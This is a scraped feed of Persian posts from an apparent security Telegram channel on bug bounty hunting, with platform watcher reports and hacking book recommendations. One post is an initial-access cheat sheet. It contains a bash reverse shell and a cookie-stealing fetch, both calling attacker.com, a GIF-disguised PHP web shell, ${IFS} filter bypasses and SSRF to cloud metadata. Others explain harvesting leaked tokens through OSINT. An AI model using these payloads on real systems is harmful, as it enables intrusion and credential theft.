📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 27 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

──────────────
📡 Follow : 👉 @zerosec_team

🎯 اکسپلویت آسیب‌پذیری‌های وب برای دسترسی اولیه (Initial Access)

یه لیست توپ از تریک‌هایی که می‌تونی باهاشون از راه وب اپ دستتو بندازی داخل👇

🔥 1. RCE (Remote Code Execution)

مستقیم شل بفرست:

bash -i >& /dev/tcp/attacker.com/4444 0>&1

با curl یا wget اسکریپت اجرا کن
bypass فایروال با base64 یا ${IFS}

📂 2. File Upload

آپلود شل php، aspx، jsp
دور زدن فیلتر با:
shell.php.jpg یا shell.pHp
آپلود تصویری با کد PHP داخلش

GIF89a<?php system($_GET['cmd']); ?>

💉 3. SQL Injection → RCE

INTO OUTFILE برای ریختن شل روی سرور
MSSQL و xp_cmdshell برای اجرای دستور مستقیم

🧬 4. Command Injection

تست با: ;id, |whoami, && curl
استفاده از ${IFS} یا $(command)

🔁 5. SSRF → RCE یا Info Leak

دسترسی به metadata سرور:

http://169.254.169.254/...

اتصال به Redis بدون پسورد برای نوشتن SSH Key

🔐 6. Auth Bypass → دسترسی به Admin Panel

JWT با الگوریتم none
تست مسیرهایی مثل /admin، /debug

📦 7. Deserialization → RCE

با ysoserial یا PHPGGC پِیلود بساز
اجرا از طریق پارامترهایی که داده سریال‌شده می‌گیرن

📁 8. LFI → RCE

Poison کردن لاگ با شل
Include کردن sessionهای PHP
Log read از مسیر:

/var/log/apache2/access.log

⚡ 9. XSS → سرقت کوکی admin یا CSRF

Stored XSS برای اجرا روی پنل ادمین
دزدیدن کوکی با:

fetch("https://attacker.com?c="+document.cookie)

⚙️ 10. Misconfig → Access

phpMyAdmin بی‌پسورد
Jenkins باز
.env یا .git لو رفته
configهای AWS و DB بدون حفاظت

_______________________________
📡 Join us 👉 @zerosec_team

هک فقط تو باگ بانتی خلاصه میشه؟ 🤔
+ That’s not my library!
+ Just Raspberry Pi book😍
_______________________________
📡 Join us 👉 @zerosec_team

فکت :
جوری که مردم بخاطر ارزش پایین پول ملی رو اوردن به باگ بانتی و ترید واقعا پشم ریزونه
👎
_______________________________
📡 Join us 👉 @zerosec_team

Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers
#Book
_______________________________
📡 Join us 👉 @zerosec_team

Black Hat Python: Python Programming for Hackers and Pentesters
#Book
_______________________________
📡 Join us 👉 @zerosec_team

The Hacker Playbook 3: Practical Guide To Penetration Testing
#Book
_______________________________
📡 Join us 👉 @zerosec_team

Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats
#Book
_______________________________
📡 Join us 👉 @zerosec_team

به جای دیدن دوره های بی سر و ته کتاب بخونید و تمرین کنید
Read
Practice
Repeat

"Knowledge is power."
— Francis Bacon

_______________________________
📡 Join us 👉 @zerosec_team

فکت‌:
جایگاه باگ هانترا تو هک و امنیت معادل ورد پرس کارا بین طراح های سایت هاست🤣
_______________________________
📡 Join us 👉 @zerosec_team

چرا APTها دانش بیشتری دارن؟

حمایت مالی و تیمی دارن (معمولاً توسط دولت‌ها)
زمان زیادی برای تحقیق و تست دارن
به آسیب‌پذیری‌های (Zero-Day) دسترسی دارن
شبکه، سیستم‌عامل و ابزارهای دفاعی رو عمیقاً می‌فهمن
ردپا پاک می‌کنن و ماندگار می‌مونن بدون شناسایی
_______________________________
📡 Join us 👉 @zerosec_team

📊 Watcher Summary Report

🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 1 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

──────────────
📡 Follow :
👉 @zerosec_team

📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

──────────────
📡 Follow :
👉 @zerosec_team

📌 نقش و جایگاه OSINT در باگ‌بانتی:

1. 🎯 پیدا کردن اهداف مخفی (Scope Discovery)
با استفاده از OSINT می‌تونی:

ساب‌دامین‌هایی پیدا کنی که توی داکیومنت رسمی نیستن
زیرساخت‌هایی رو کشف کنی که در اسکوپ هستن ولی مستند نشده‌ان (مانند staging، test، admin، dev)
سرویس‌هایی مثل:
dev-payments.target.com
stg-api.targetcdn.net
خیلی وقتا باگ‌های حیاتی توی همین subdomainهای فراموش‌شده پیدا می‌شن.
2. 🧠 فهم بهتر ساختار شرکت و تکنولوژی‌ها
با تکنیک‌های OSINT می‌تونی:

بفهمی شرکت با چی ساخته شده (Tech stack: React, Laravel, NGINX, AWS...)
بفهمی تیم dev چطور deploy می‌کنن
ایمیل‌های کارکنان رو دربیاری (که به درد مهندسی اجتماعی یا رمز عبورهای قابل حدس می‌خوره)
3. 🔑 Credential Stuffing و کشف اطلاعات حساس
با سرچ در:

GitHub
Pastebin
Google Dork
می‌تونی دسترسی‌هایی مثل:

توکن‌های API
رمزهای پیش‌فرض
دامپ دیتابیس
فایل‌های env لو رفته
پیدا کنی و باهاشون ورود کنی یا آسیب‌پذیری کشف کنی.

4. 🔍 شناسایی حمله‌پذیری‌ها از روی سوشال‌مدیا و بلاگ‌ها
پست‌های کارکنان در لینکدین یا توییتر می‌تونه اطلاعاتی مثل:
فریم‌ورک‌ها
دامنه‌های در حال توسعه
تغییرات در سیستم auth
رو لو بده.

5. 📎 اتصال چند تکه اطلاعات به هم (Correlation)
مثلاً:

از طریق GitHub یه توکن می‌گیری
با اون به subdomainی که از crt.sh پیدا کردی auth می‌کنی
و در نهایت یه RCE می‌گیری
اینا فقط وقتی ممکن می‌شن که OSINT قوی باشه.

──────────────
📡 Follow :
👉 @zerosec_team

باگ‌هایی که با پاداش‌های بزرگ همراه هستن، لزومی نداره صرفاً از مهارت‌های فنی نشأت بگیرن.
خیلی از اونا حاصل این مواردن:

۱- خطای انسانی (Human Error)
۲- بی‌توجهی تیم‌ها به اصول پایه
۳- ضعف در ساختار تیم DevSecOps
۴- یا حتی فقط عجله در دیپلوی یه فیچر قبل از ددلاین

خیلی از هکرهای تاپ:

رد تیم واقعی اجرا می‌کنن
با ترکیب OSINT + Social Engineering + Fuzzing + دسترسی داخلی، عملاً وارد سیستم می‌شن مثل یه نفوذگر داخل سازمان
دسترسی‌ رو Persist می‌کنن، یعنی بعد از اولین ورود، راه دومی هم می‌سازن که اگه مسیر اول قطع شد، همچنان داخل بمونن
حتی بعضی وقت‌ها، مثل وایت‌باکس پنتسترها، کل ساختار کد رو هم می‌تونن تحلیل کنن (مثلاً از روی سورس لو رفته در GitHub یا Leak داخلی)

مثال واقعی (ترکیب فنی + انسانی):

یه هکر:

توی LinkedIn می‌فهمه فلانی dev تیم auth شرکت X هست.
تو GitHub دنبال ریپوهای این شخص می‌گرده.
توی یه ریپو، فایل .env توی commit اولیه push شده ولی بعداً حذف شده.
با git-dorking فایل رو بازیابی می‌کنه → توکن dev می‌گیره.
توکن رو تست می‌کنه → می‌بینه به staging همون auth سرور وصله.
از اونجا SSRF → RCE → دسترسی به production DB
ولی اگر نگاه کنی:

هیچ‌کدوم از این مراحل pure technical exploit نبود. همه‌ش Human Layer+OSINT+Persistence بود.

──────────────
📡 Follow :
👉 @zerosec_team

“ تو ماشین تست نیستی ”

اگه امروز مثل یه ابزار فکر کنی، فردا با ابزار جایگزین می‌شی.
ولی اگه مثل یه مهاجم واقعی فکر کنی، غیرقابل‌ تکرار می‌شی.

بخشی از نگرش جدید یک هکر واقعی:
کمتر ابزار، بیشتر تحلیل ذهنی
ترکیب فنی + روانشناسی + OSINT
نگاه سیستمی به سازمان هدف
تفکر مثل insider یا red team

و در کل استایل هانت کردن شما خیلی مهمه✌️

سعی کنید تفکر black داشته باشید ولی نتیجه white hat باشید

──────────────
📡 Follow :
👉 @zerosec_team

تلویزیون های اسنوا هک شده و هیچی بالا نمیاره

شایعاتی هست که میگه پول طرف چینی رو ندادن اونام قطع کردنشون

(تلفن ۱۶۹۶ پاسخگو اسنوا هم از دسترس خارج کردن کسی تو پشتیبانی پاسخگو نیست)

⭐️ @ZeroSec_team

📏 استاندارد اجرای تست نفوذ (PTES)

این استاندارد، یکی از کامل‌ترین و شناخته‌شده‌ترین مدل‌ها برای انجام تست نفوذ حرفه‌ایه. اکثر تیم‌های امنیتی به این مدل استناد می‌کنن چون ساختاری منطقی و مرحله ‌به‌ مرحله ارائه می‌ده.

Pre-engagement Interactions
تعاملات و توافق‌های اولیه با مشتری قبل از شروع تست

Intelligence Gathering
جمع‌آوری اطلاعات اولیه (شناسایی - Recon)

Threat Modeling
مدل‌سازی تهدیدات (تحلیل اینکه چه تهدیدهایی برای سیستم وجود داره)

Vulnerability Analysis
تحلیل آسیب‌پذیری‌ها

Exploitation
بهره‌برداری (استفاده از آسیب‌پذیری‌ها)

Post-Exploitation
کارهایی که بعد از Exploit انجام می‌دیم (مثل حفظ دسترسی، حرکت افقی، رمزها و...)

Reporting
تهیه گزارش نهایی تست نفوذ

لینک: Pre-engagement Interactions
تعاملات و توافق‌های اولیه با مشتری قبل از شروع تست

Intelligence Gathering
جمع‌آوری اطلاعات اولیه (شناسایی - Recon)

Threat Modeling
مدل‌سازی تهدیدات (تحلیل اینکه چه تهدیدهایی برای سیستم وجود داره)

Vulnerability Analysis
تحلیل آسیب‌پذیری‌ها

Exploitation
بهره‌برداری (استفاده از آسیب‌پذیری‌ها)

Post-Exploitation
کارهایی که بعد از Exploit انجام می‌دیم (مثل حفظ دسترسی، حرکت افقی، رمزها و...)

Reporting
تهیه گزارش نهایی تست نفوذ

پیشنهاد میکنم کامل بخونید نکات خوبی داره :
http://www.pentest-standard.org/

⭐️ @ZeroSec_team

📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 22 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 13 new items
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report

──────────────
📡 Follow :
👉 @zerosec_team

https://github.com/demining/Digital-Signature-Forgery-Attack

──────────────
📡 Follow :
👉 @zerosec_team